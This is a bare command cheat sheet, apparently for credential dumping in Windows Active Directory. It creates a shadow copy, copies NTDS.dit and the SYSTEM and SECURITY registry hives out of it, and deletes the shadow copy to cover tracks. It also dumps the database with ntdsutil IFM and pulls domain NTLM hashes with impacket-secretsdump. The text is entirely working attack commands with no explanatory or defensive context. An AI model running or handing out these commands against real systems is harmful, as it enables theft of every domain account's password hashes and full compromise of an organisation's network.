# create shadow
vssadmin create shadow /for=C: 2>&1
# copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\windows\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\windows\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\windows\temp\"
# delete
vssadmin delete shadow /ShadowID=fec107cb-cd76-4dbc-b51c-ca4693a820ed
ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\windows\temp' q q
impacket-secretsdump -just-dc-ntlm domain/administrator@domain.local -outputfile domain